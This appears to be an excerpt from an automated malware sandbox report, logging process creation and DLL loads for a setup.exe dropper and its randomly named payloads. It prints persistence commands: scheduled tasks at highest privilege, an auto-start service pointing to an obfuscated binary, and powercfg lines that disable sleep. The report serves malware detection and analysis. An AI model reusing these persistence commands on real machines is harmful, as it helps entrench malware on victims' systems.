Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CIFUBVHI"
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Process created: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp "C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp" /SL5="$70066,5141152,54272,C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe .\Install.exe	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CIFUBVHI"
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 424 -ip 424
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 284
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe .\Install.exe /bfYudidAVdU "385137" /S
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Process created: C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe "C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe" -i
Source: C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe .\Install.exe /iwYBYdidlHmT "525403" /S
Source: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: gpedit.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: dssec.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: dsuiext.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncasvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: httpprxp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msidle.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhcfg.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: efsutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wpdbusenum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceconnectapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: vcruntime140.dll	Jump to behavior
